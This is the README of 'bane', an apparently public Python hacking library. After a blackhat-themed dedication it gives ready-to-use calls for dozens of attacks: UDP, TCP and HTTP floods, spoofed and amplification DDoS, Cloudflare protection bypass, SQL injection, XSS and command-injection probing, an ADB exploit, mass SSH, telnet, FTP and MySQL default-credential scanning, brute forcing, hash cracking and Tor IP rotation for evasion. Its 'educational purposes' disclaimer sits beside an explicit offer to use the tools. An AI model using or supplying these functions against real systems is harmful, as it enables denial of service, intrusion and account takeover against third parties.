"Oh, you think darkness is your ally. But you merely adopted the dark; I was born in it, molded by it. I didn't see the light until I was already a man, by then it was nothing to me but BLINDING! The shadows betray you, because they belong to me!" -Bane (Dark Knight)



                                .///` `.--::::::---.`` `///.                                    
                                h-.-s+++/--<br>.---/+o++s:.-h                                    
                                ++..-.                `:../s                                    
                             -+ydm-..:                :..-dmho:`                                
                          :odmNNNNs..-.              `:..+MNNNmmy/.                            `
                       .odmNNNNMMMN`..:              -..`mMMMMNNNNmy:                           
                      +mNNNNMMMMMMMo`.:`             :``/MMMMMMMMNNNmy.                         
                    .yNNNNMMMMMMMMMd` `-<br>```````..-` `yMMMMMMMMMMNNNd:                        
                   -dNNNMMMMMMMMMMMN`  ..-`      `-`-   mMMMMMMMMMMMMNNmo                       
                  :mNNNMMMMMMMMMMMMM:   .         `.`  -MMMMMMMMMMMMMMNNNs`                     
                 /mNNNMMMMMMMMMMMMMMy   ---      .--   oMMMMMMMMMMMMMMMNNNy`                    
                :mNNNMMMMMMMMMMMMMMMN```:.````````.:```dMMMMMMMMMMMMMMMMNNNy`                   
               -mNNNNMMMMMMMMMMMMMMMMo`.-`        `-.`+MMMMMMMMMMMMMMMMMNNNNo                   
               hNNNNNMMMMMMMMMMMMMMMMm.``-        .``.dMMMMMMMMMMMMMMMMMMNNNm-                  
              -NNNNNMMMMMMMMMMMMMMMMMM-..:        -<br>NMMMMMMMMMMMMMMMMMMNNNNs                  
              oNNNNNMMMMMMMMMMMMMMMMMMo``.`       -` +MMMMMMMMMMMMMMMMMMMNNNNm                  
             :dNNNNNNMMMMMMMMMMMMMMMMMd<br>-``````<br>.hMMMMMMMMMMMMMMMMMMMNNNNNs.                
           .ssmNNNNNNMMMMMMMMMMMMMMMMMM.``/:.  .-/```NMMMMMMMMMMMMMMMMMMNNNNNNyy+`             `
         `oy: mNNNNNNMMMMMMMMMMMMMMMMMM/``-`    `-``:MMMMMMMMMMMMMMMMMMMNNNNNN/`+y:            `
         +y`  dNNNNNNMMMMMMMMMMMMMMMMMMy..-:-  --:..oMMMMMMMMMMMMMMMMMMMNNNNNN:  -N`            
         m-   hNNNNNNMMMNdhhyyhddmMMMMMd```:.``.:```hMMMMNdhso++++shmNMMMNNNNN:   yo           `
        /d    yNNNNNMMh/-````````.-/ydNM.``-    -```NNds:.`..-----..-sNMMNNNNN-   -m`           
        h+    sNNNNNMMmsyhddmmmdhs:` `-o/../`  `/-.:+-` `:yhddmNNNNmmNMMMNNNNN.    d/           
        m/    oNNNNNMMMMMMMNdyssoooo:` `:..``.+```.-.  :o++//+yydMMMMMMMMNNNNN`   .so           
        d--   /NNNNNNMMMMMmyhm//   ymy.`-     o    `- odm:-  .ddssNMMMMMNNNNNm    /:s           
       .h /   :NNNNNNNMMMmhshhy+++ohy/. .:   `o`  `/``-shysssyddddNMMMMNNNNNNd   --.h 
       -y `:  .NNNNNNNMMMMMMMMNNmmmhys/:.`..``.``..`-:syhhdmNNMMMMMMMMMMNNNNNy   / `d 
       :s  :`  dNNNNNMMMMMMMMMNNNmmNNh-    `.`  `.`  `+mMNNNNNMMMMMMMMMMNNNNN+  :`  m          `
       /o   /` oNNNNMMMMMMMMMMMMMMmd+.. `.:- -` - -:.. -sddmNMMMMMMMMMMMMNNNm. .:   m          `
       ++   `:``dNNNMMMMMMMMMMMNo+/.`./-. o`  --`  o `-/.``/+omMMMMMMMMMMNNNo .:    d`         `
       -h    `:`:mNNMMMMMMMMMMd-.+.+--:.`.+.-.::.-./-`.:--/:+..hMMMMMMMMMNNh`.:    -h          `
        s:    `:`+mNMMMMMMMMMm- `/:` o/://++:++++:+/+/:/o``:+` .mMMMMMMMMNd..:     y-           
        .h     `:`/hNMMMMMMd+: -::<br>s-:+`.+:+-.+:+:`/:-+:-.-:- :NMMMMMMNy.--    :y            
         o/   ` `:``:ymMNh:`-  /:-+`o::/`  +:/. +:+`  /::o./--+  /omMNdo- --  `   h.            
         `d` `+.` :.` -s:  -` ./:::`/::/   +-/. +-+`  :::/`-:::- `-`++.``-. `-+  :s             
          o+  /`-:``.-.   `-  /--/  /:-:   +-/. +-+   :-:+  /--/  .. `--. .:..:  h.             
          `d` :` +h+.     -  `+-:: .+-:+..-+://-+:+-../:-+-`-:-/.  -`   -yd. /  /s              
           o+ `:. -ydo.  -`  //::..o/-:o:.//:/++/:/+.:+/-/+: /::o   : :yd+``--  d.              
           `d   .:. -sy ..  .o--+ -.+-.`.-/<br>:/<br>/--`.-+.: +--o-  `/d+``--`:s               
            s/    .:` :.:```-o--o.-.:-` `:/   .:   /:` `-/ / s:-o-```+``.-`    h.               
            .h      -:`/.///`/..`:-.:`<br> <br><br><br>. <br>`: /--../ //:o.:.-y                
             s:       -o/::/:--.-.-.:                    : /`:.---/::+.       y-                
             `h.       ``/. `/ `  -.:```   <br><br>..`  ```: /  ` :` ./.     +o                 
              .y.         -.--    -.:.``- -```::```: ..`./ :    .-.-`       /s                  
               .y-                -.:```: :/::o+/::/ : ``: :              `+o                   
                `s+`     -..-     -.o/:/: `+::+//:+. -/::o`:     ..`-`   .s/                    
                  :s-  ./-  `-    -.o//o.  /:::-::+  `o//o :    -`  ./.`+o.                     
                   `/o:+..+`.`    -.://+<br>+--//:-+<br>////`:    `../-.ss-                       
                      /h  /` ..-`  .-o/+:..+--//:-+..-o/+:.` `-.- `+  y-                        
                       o+``.-+-.::<br>o//o- /--::--+ .o//s<br>:/.-//:``:s                         
                        -o:```.//:   :+::+.o--oo:-o.+::+/   :/o.```:o:                          
                          -o++oy.:    .- /`o::oo:-+-/ --    /o++++o:                            
                               `os      .. /..//../ ..`    `s:                                  
                                `o+.       `:`:-.-.     `.++-                                   
                                  `/+/.`    `.  .`   `-++:`                                     
                                     `:+++/:-<br>-:+++/-                                         
                                          `.-::--`                                              
                                                                                               `



---------------------------------------------------------------------------------------------------------------------------
                                                      INTRODUCTION:
---------------------------------------------------------------------------------------------------------------------------

This python library is made for educationnal purposes only. Me, as the creator and developper, not responsible for any misuse for this module in any malicious activity. it is made as a tool to understand how hackers can create their tools and performe their attacks. it contains most of known attacks and exploits. it can be used to perform: DoS and DDoS attacks (all known tools are included), information gathering, scrapping proxies, crawling, google dorking, checking for vulnerabilities (sql injection (all types), xss, command execution, php code injection, FI, forced browsing<br>) and even more ;)

---------------------------------------------------------------------------------------------------------------------------
                                                      SPECIAL SPEECH:
---------------------------------------------------------------------------------------------------------------------------

this is dedicated to my mentor: Zachary Barker ( https://www.facebook.com/zachary.barker.5439 ), he was my leader and teacher through my journey in hacking world and groups, we have been through a lot together and were there in many operations when i was an active member in blackhat community but now he is dead in a hit-and-run :( . he was one of my true cyber bros:

-S0u1 ( https://www.facebook.com/S0u1.HLoTW ) : programmer and blackhat.
<br>-Vince ( https://www.facebook.com/vincelinux ) : Linux and hardware expert, social engeneering and programmer.
<br>-Zachary Barker (lulz zombie) : teams leader, anarkist, ops organizer, progammer, cyber security expert and blackhat.
<br>-Lulztigre (https://www.twitter.com/lulztigre) : Bug Bounty Hunter, Penetration Tester And Python Programmer.
<br>-Jen Hill.
<br>in the honor of all my bros and the memory of my bro zach im sharing all my personal hacking tools with public for the first time. plz use it wisely :)

now let's start some tutorials, shall we?

---------------------------------------------------------------------------------------------------------------------------
                                                      TUTORIALS:
---------------------------------------------------------------------------------------------------------------------------
I-INSTALLING THE LIBRARY AND IMPORTING:
---------------------------------------------------------------------------------------------------------------------------

you can use pip to do that ( if you are on linux you must run it with "sudo" ) :


pip install bane

<br>or you can clone the project's link then run setup.py<br>

<br>git clone https://github.com/AlaBouali/bane
<br>cd bane
<br>python setup.py install

<br>to import it you just do:


import bane


---------------------------------------------------------------------------------------------------------------------------
II-Usage (General usage):
---------------------------------------------------------------------------------------------------------------------------

# DDoS:

<h4>UDP FLOOD:</h4>
<br>bane.udp_flood(IP, p= port , min_size=10, max_size=20 , duration= 300 , interval=0.001)
<h4>TCP FLOOD:</h4>
<br>bane.tcp_flood(IP, p= port , min_size=10, max_size=20 , duration= 300 , interval=0.001 , threads=500, timeout=5)
<h4>HTTP FLOOD:</h4>
<br>bane.http_flood(IP, p= port , duration= 300 ,interval=0.001 , threads=500 , timeout=5)
<h4>HTTP FLOOD using proxies (HTTP/SOCKS4/SOCKS5):</h4>
<br>bane.prox_http_flood(IP, p= port , duration= 300 ,interval=0.001 , threads=500 , timeout=5)
<h4>Torshammer attack:</h4>
<br>bane.torshammer(IP, p= port , duration= 300 ,set_tor=False , threads=500 , timeout=5)
<h4>Torshammer attack but through proxies instead of Tor:</h4>
<br>bane.prox_hammer(IP, p= port , duration= 300 , threads=500 , timeout=5)
<h4>R.U.D.Y attack:</h4>
<br>bane.rudy(IP, p= port , duration= 300 ,set_tor=False , threads=500 , timeout=5 , form="q" , page="/search.php")
<h4>Xerxes attack:</h4>
<br>bane.xerxes(IP, p= port , duration= 300 ,set_tor=False , threads=500 , timeout=5 )
<h4>Xerxes attack through proxies:</h4>
<br>bane.prox_xerxes(IP, p= port , duration= 300 , threads=500 , timeout=5 )
<h4>Slow read attack:</h4>
<br>bane.slow_read(IP, p= port , duration= 300 , set_tor=False , threads=500 , timeout=5 )
<h4>Slow proxies flood:</h4>
<br>bane.prox_slow(IP, p= port , duration= 300 , set_tor=False , threads=500 , timeout=5 )
<h4>Apache killer attack:</h4>
<br>bane.apache_killer(IP, p= port , duration= 300 , set_tor=False , threads=500 , timeout=5 )
<h4>Slowloris attack:</h4>
<br>bane.slowloris(IP, p= port , duration= 300 , set_tor=False , threads=50 , timeout=5 )
<h4>Slowloris attack through proxies:</h4>
<br>bane.prox_slowloris(IP, p= port , duration= 300 , threads=500 , timeout=5 )
<h4>Hulk attack:</h4>
<br>bane.hulk(IP , duration= 300 , set_tor=False , threads=500 , timeout=5 )
<h4>Hulk attack through proxies:</h4>
<br>bane.prox_hulk(IP , duration= 300 , set_tor=False , threads=500 , timeout=5 )
<h4>TCP flags attack:</h4>
<br>bane.synflood(IP , p=port , duration= 300 , syn=1 , rst=0 , psh=0 , ack=0 , urg=0 , fin=0 , interval=0.1 , threads=50 )
<h4>Spoofed source UDP flood:</h4>
<br>bane.spoofed_udp_flood(IP , p=port , duration= 300 , min_size=10 , max_size=20 , interval=0.1 , threads=50 )
<h4>LAND attack:</h4>
<br>bane.land(IP , p=port , duration= 300 , min_size=10 , max_size=20 , interval=0.1 , threads=50 )
<h4>DNS amplification attack:</h4>
<br>bane.dns_amplification(IP , p=port , duration= 300 , servers=[] , interval=0.1 , threads=50 )
<h4>NTP amplification attack:</h4>
<br>bane.ntp_amplification(IP , p=port , duration= 300 , servers=[] , interval=0.1 , threads=50 )
<h4>Memcache amplification attack:</h4>
<br>bane.memcache_amplification(IP , p=port , duration= 300 , servers=[] , interval=0.1 , threads=50 )
<h4>Chargen amplification attack:</h4>
<br>bane.chargen_amplification(IP , p=port , duration= 300 , servers=[] , interval=0.1 , threads=50 )
<h4>SSDP amplification attack:</h4>
<br>bane.ssdp_amplification(IP , p=port , duration= 300 , servers=[] , interval=0.1 , threads=50 )
<h4>SNMP amplification attack:</h4>
<br>bane.snmp_amplification(IP , p=port , duration= 300 , servers=[] , interval=0.1 , threads=50 )
<h4>ECHO reflection attack:</h4>
<br>bane.echo_reflection(IP , p=port , min_size=10 , max_size=20 , duration= 300 , servers=[] , interval=0.1 , threads=50 )
<h4>ICMP FLOOD:</h4>
<br>bane.icmp_flood(IP, p= port , min_size=10, max_size=20 , duration= 300 , interval=0.001 , threads=500 )
<h4>ICMP FLOOD with spoofed sources:</h4>
<br>bane.spoofed_icmp_flood(IP, p= port , min_size=10, max_size=20 , duration= 300 , interval=0.001 , threads=500 )
<h4>BlackNurse attack:</h4>
<br>bane.blacknurse(IP, p= port , duration= 300 , interval=0.001 , threads=500 )
<h4>Goldeneye attack:</h4>
<br>bane.goldeneye(IP, p= port , duration= 300 , threads=500 , timeout=5 )
<h4>Doser attack:</h4>
<br>bane.doser(link , duration= 300 , set_tor=False , threads=500 , timeout=5 )
<h4>Doser attack through proxies:</h4>
<br>bane.doser(link , duration= 300 , threads=500 , timeout=5 )
<h4>Bypass "Under attack mode" provided by CloudFlare:</h4>
<br>bane.cf_kill_ua(link , duration= 300 , threads=500 , timeout=5 )
<h4>Bypass "Under attack mode" provided by CloudFlare and Rate-Limiting:</h4>
<br>bane.cf_kill_ua_rate_limiting(link , duration= 300 , set_tor=False , threads=500 , timeout=5 )

# WordPress testing:

<h4>Users list:</h4>
<br>bane.wp_users_list(link , timeout=15 )
<h4>User information:</h4>
<br>bane.wp_user(link , user=user_id , timeout=15 )
<h4>Posts list:</h4>
<br>bane.wp_posts_list(link , timeout=15 )
<h4>Post information:</h4>
<br>bane.wp_post(link , post=post_id , timeout=15 )
<h4>Users Enumeration:</h4>
<br>bane.wp_users_enumeration(link , timeout=15 )
<h4>WordPress version:</h4>
<br>bane.wp_version(link , timeout=15 )
<h4>Vulnerable plugins and themes:</h4>
<br>bane.wp_scan(link , timeout=15 )

# Vulnerabilities TESTING:

<h4>SQL Injection error based:</h4>
<br>bane.sqli_error_based(link , timeout=15 )
<h4>SQL Injection boolean based:</h4>
<br>bane.sqli_boolean_based(link , timeout=15 )
<h4>SQL Injection time based:</h4>
<br>bane.sqli_time_based(link , timeout=15 )
<h4>XSS GET method:</h4>
<br>bane.xss_get(link , {"q" : "<script>alert(123)</script>"}, extra={"Submit" : "Submit"} , timeout=15 )
<h4>XSS POST method:</h4>
<br>bane.xss_post(link , {"q" : "<script>alert(123)</script>"}, extra={"Submit" : "Submit"} , timeout=15 )
<h4>Automatic XSS scan for page:</h4>
<br>bane.xss(link , payload="<script>alert(123)</script>" , timeout=15 )
<h4>Command execution with a link:</h4>
<br>bane.command_exec_link(link , timeout=15 )
<h4>Command execution GET method:</h4>
<br>bane.command_exec_get(link,param="q" , timeout=15 )
<h4>Command execution POST method:</h4>
<br>bane.command_exec_post(link,param="q" , timeout=15 )
<h4>PHP code injection with a link:</h4>
<br>bane.php_code_inject_link(link , timeout=15 )
<h4>PHP code injection GET method:</h4>
<br>bane.php_code_inject_get(link,param="q" , timeout=15 )
<h4>PHP code injection POST method:</h4>
<br>bane.php_code_injectc_post(link,param="q" , timeout=15 )
<h4>File inclusion:</h4>
<br>bane.file_inclusion(link, timeout=15 )
<h4>Headers timeout:</h4>
<br>bane.headers_timeout_test(IP , port=80, max_timeout=30 )
<h4>Slow GET test:</h4>
<br>bane.slow_get_test(IP , port=80, duration=180 )
<h4>Maximum number of allowed connections from a single host:</h4>
<br>bane.max_connections_limit(IP , port=80, connections=150 , duration=180 )
<h4>Slow POST test:</h4>
<br>bane.slow_post_test(IP , port=80, duration=180 )
<h4>Slow Read test:</h4>
<br>bane.slow_read_test(IP , port=80, duration=180 )
<h4>Android Debug Bridge (ADB) exploit:</h4>
<br>bane.adb_exploit(IP , timeout=5 )
<h4>Exposed unauthenticated Telnet server:</h4>
<br>bane.exposed_telnet(IP , timeout=5 )


# Proxies collecting:

<h4>Mass HTTP proxies gathering:</h4>
<br>bane.masshttp()
<h4>Mass SOCKS4 proxies gathering:</h4>
<br>bane.massocks4()
<h4>Mass SOCKS5 proxies gathering:</h4>
<br>bane.massocks5()
<h4>Some HTTP proxies gathering:</h4>
<br>bane.http()
<h4>Some HTTPS proxies gathering:</h4>
<br>bane.https()
<h4>Some SOCKS4 proxies gathering:</h4>
<br>bane.socks4()
<h4>Some SOCKS5 proxies gathering:</h4>
<br>bane.socks5()
<h4>Checking proxy:</h4>
<br>bane.proxy_check(IP , port , proto="http" , timeout=5)


# IoTs mass scanning:

<h4>Mass ssh scanning: (if you are on Windows OS, please install Putty)</h4>
<br>bane.mass_ssh(threads=100 , word_list= ["root:root","admin:admin"] )
<h4>Mass telnet scanning:</h4>
<br>bane.mass_telnet(threads=100 , word_list= ["root:root","admin:admin"] )
<h4>Mass telnet scanning:</h4>
<br>bane.mass_telnet(threads=100 , word_list= ["root:root","admin:admin"] )
<h4>Mass unauthenticated telnet scanning:</h4>
<br>bane.mass_exposed_telnet(threads=100 )
<h4>Mass FTP scanning:</h4>
<br>bane.mass_ftp(threads=100 , word_list= ["root:root","admin:admin"] )
<h4>Mass Anonymous FTP scanning:</h4>
<br>bane.mass_ftp_anon(threads=100 )
<h4>Mass SMTP scanning:</h4>
<br>bane.mass_smtp(threads=100 , word_list= ["root:root","admin:admin"] )
<h4>Mass MySQL scanning:</h4>
<br>bane.mass_mysql(threads=100 , word_list= ["root:root","admin:admin"] )
<h4>Mass MySQL scanning for servers with username "root" and empty password:</h4>
<br>bane.mass_mysql_default(threads=100 )
<h4>Mass Android Debug Bridge (ADB) exploit:</h4>
<br>bane.mass_adb(threads=100 )

# Extract information from page:

<h4>Get all page inputs and their values:</h4>
<br>bane.inputs(link , value=True , timeout=10 )
<h4>Get all page forms and their values:</h4>
<br>bane.forms(link , value=True , timeout=10 )
<h4>Get login form:</h4>
<br>bane.loginform(link , value=True , timeout=10 )
<h4>Get all links on the page:</h4>
<br>bane.crawl(link , timeout=10 )
<h4>Get all paths on the page:</h4>
<br>bane.pather(link , timeout=10 )
<h4>Get all social media and external links on the page:</h4>
<br>bane.media(link , timeout=10 )
<h4>Get all subdomains links on the page:</h4>
<br>bane.subdomains_extract(link , timeout=10 )

# Information gathering:

<h4>Get banner:</h4>
<br>bane.get_banner(IP , p=port , payload=None , timeout=5 )
<h4>Get infomation about Domain or IP:</h4>
<br>bane.info(IP , timeout=15 )
<h4>safeweb.norton.com report for a link:</h4>
<br>bane.norton_rate(link , timeout=15 )
<h4>Your IP address:</h4>
<br>bane.myip()
<h4>WHOIS:</h4>
<br>bane.who_is( domain )
<h4>GEO-Information for any IP:</h4>
<br>bane.geoip( IP )
<h4>HTTP headers:</h4>
<br>bane.headers( link )
<h4>Reverse IP Lookup:</h4>
<br>bane.reverse_ip_lookup( IP )
<h4>Resolve any domain using a specific DNS server:</h4>
<br>bane.resolve( domain , server="8.8.8.8" )
<h4>Very Fast port scan:</h4>
<br>bane.port_scan( IP , ports=[21,22,23,25,43,53,80,443,2082,3306] , timeout=5 ).result
<h4>Subdomains finder:</h4>
<br>bane.subdomains_finder( domain )

# Encryption:

<h4>XOR:</h4>
<br>bane.hasher.xor( data, key )
<h4>Caesar:</h4>
<br>bane.hasher.caesar( data, key )
<h4>MD5:</h4>
<br>bane.hasher.md_5( data )
<h4>SHA1:</h4>
<br>bane.hasher.sha1( data )
<h4>SHA224:</h4>
<br>bane.hasher.sha224( data )
<h4>SHA256:</h4>
<br>bane.hasher.sha256( data )
<h4>SHA384:</h4>
<br>bane.hasher.sha384( data )
<h4>SHA512:</h4>
<br>bane.hasher.sha512( data )
<h4>Base64 encoding:</h4>
<br>bane.hasher.base64encode( data )
<h4>Base64 decoding:</h4>
<br>bane.hasher.base64decode( data )
<h4>File content encryption with XOR:</h4>
<br>bane.hasher.xorfl( file , key )
<h4>File content encryption with MD5:</h4>
<br>bane.hasher.md5fl( file )
<h4>File content encryption with SHA1:</h4>
<br>bane.hasher.sha1fl( file )
<h4>File content encryption with SHA224:</h4>
<br>bane.hasher.sha224fl( file )
<h4>File content encryption with SHA256:</h4>
<br>bane.hasher.sha256fl( file )
<h4>File content encryption with SHA384:</h4>
<br>bane.hasher.sha384fl( file )
<h4>File content encryption with SHA512:</h4>
<br>bane.hasher.sha512fl( file )
<h4>File content encoding with base64:</h4>
<br>bane.hasher.base64encodefl( file )
<h4>File content decoding with base64:</h4>
<br>bane.hasher.base64decodefl( file )

# Decryption:

<h4>MD5:</h4>
<br>bane.decrypt(hash , word_list=["admin","admin123","love"] , md5_hash=True )
<h4>SHA1:</h4>
<br>bane.decrypt(hash , word_list=["admin","admin123","love"] , sha1_hash=True )
<h4>SHA224:</h4>
<br>bane.decrypt(hash , word_list=["admin","admin123","love"] , sha224_hash=True )
<h4>SHA256:</h4>
<br>bane.decrypt(hash , word_list=["admin","admin123","love"] , sha256_hash=True )
<h4>SHA384:</h4>
<br>bane.decrypt(hash , word_list=["admin","admin123","love"] , sha384_hash=True )
<h4>SHA512:</h4>
<br>bane.decrypt(hash , word_list=["admin","admin123","love"] , sha512_hash=True )
<h4>Base64:</h4>
<br>bane.decrypt(hash , word_list=["admin","admin123","love"] , base64_hash=True )
<h4>Caesar:</h4>
<br>bane.decrypt(hash , word_list=["admin","admin123","love"] , caesar_hash=True )

# Bruteforcing:

<h4>Admin panel on web page:</h4>
<br>bane.admin_brute_force(link , word_list=["admin:admin","admin:1234"] , timeout=15 )
<h4>FTP server:</h4>
<br>bane.hydra(IP , protocol="ftp" , word_list=["admin:admin","admin:1234"] , timeout=5 )
<h4>SSH server: (if you are on windows, please install Putty)</h4>
<br>bane.hydra(IP , p=22 , protocol="ssh" , word_list=["admin:admin","admin:1234"] , timeout=5 )
<h4>TELNET server:</h4>
<br>bane.hydra(IP , p=23 , protocol="telnet" , word_list=["admin:admin","admin:1234"] , timeout=5 )
<h4>SMTP server:</h4>
<br>bane.hydra(IP , p=25 , protocol="smtp" , ehlo=False , helo=True , ttls=False , word_list=["admin:admin","admin:1234"] , timeout=5)
<h4>MySQL server:</h4>
<br>bane.hydra(IP , p=3306 , protocol="mysqlt" , word_list=["admin:admin","admin:1234"] , timeout=5 )
<h4>WordPress login page:</h4>
<br>bane.hydra(link , protocol="wp" , word_list=["admin:admin","admin:1234"] , timeout=15 )
<h4>Admin panel finder:</h4>
<br>bane.admin_panel_finder(link , ext="php" , timeout=15 )
<h4>Force browsing pages on admin panel:</h4>
<br>bane.force_browsing(link , ext="php" , timeout=15 )
<h4>Filemanager finder:</h4>
<br>bane.filemanager_finder(link , ext="php" , timeout=15 )

# Amplification factors calculation for some protocols:

<h4>DNS:</h4>
<br>bane.dns_factor( IP , timeout=3 )
<h4>NTP:</h4>
<br>bane.ntp_factor( IP , timeout=3 )
<h4>Memcache:</h4>
<br>bane.memcache_factor( IP , timeout=3 )
<h4>Chargen:</h4>
<br>bane.chargen_factor( IP , timeout=3 )
<h4>SSDP:</h4>
<br>bane.ssdp_factor( IP , timeout=3 )
<h4>SNMP:</h4>
<br>bane.snmp_factor( IP , timeout=3 )
<h4>ECHO:</h4>
<br>bane.echo_factor( IP , timeout=3 )

# Tor IP switching:

<h4>Without password: (doesn't work with Windows OS)</h4>
<br>bane.tor_switch_no_password( interval=30 , logs=True )
<h4>Without password: (doesn't work with Windows OS)</h4>
<br>bane.tor_switch_with_password( interval=30 , password=password , p=9051 , logs=True)

# Updating bane:

<br>bane.update(version=None)

# Some extra useful functions:

<h4>Clear a file:</h4>
<br>bane.clear_file( file )
<h4>Create a file:</h4>
<br>bane.create_file( file )
<h4>Delete a file:</h4>
<br>bane.delete_file( file )
<h4>Get content of a file:</h4>
<br>bane.read_file( file )
<h4>Get CloudFlare cookie: (you must install NodeJS first)</h4>
<br>bane.get_cf_cookie( domain , user_agent )
<h4>Get HTB invitation:</h4>
<br>bane.HTB_invitation()
<h4>Get Facebook account's ID:</h4>
<br>bane.facebook_id( fb_link )
<h4>Google dorking:</h4>
<br>bane.google_dorking( dork )
<h4>Webhint report's link:</h4>
<br>bane.webhint_report( link )
<h4>Youtube search:</h4>
<br>bane.youtube_search( query )
<h4>Write to a file:</h4>
<br>bane.write_file( data , file )
<h4>Find webcams:</h4>
<br>bane.webcams( count=10 , by={'country':'us'} )
<br>bane.webcams( count=10 , by={'type':'axis'} )
<br>bane.webcams( count=10 , by={'city':'paris'} )
<br>bane.webcams( count=10 , by={'timezone':'+00:00'} )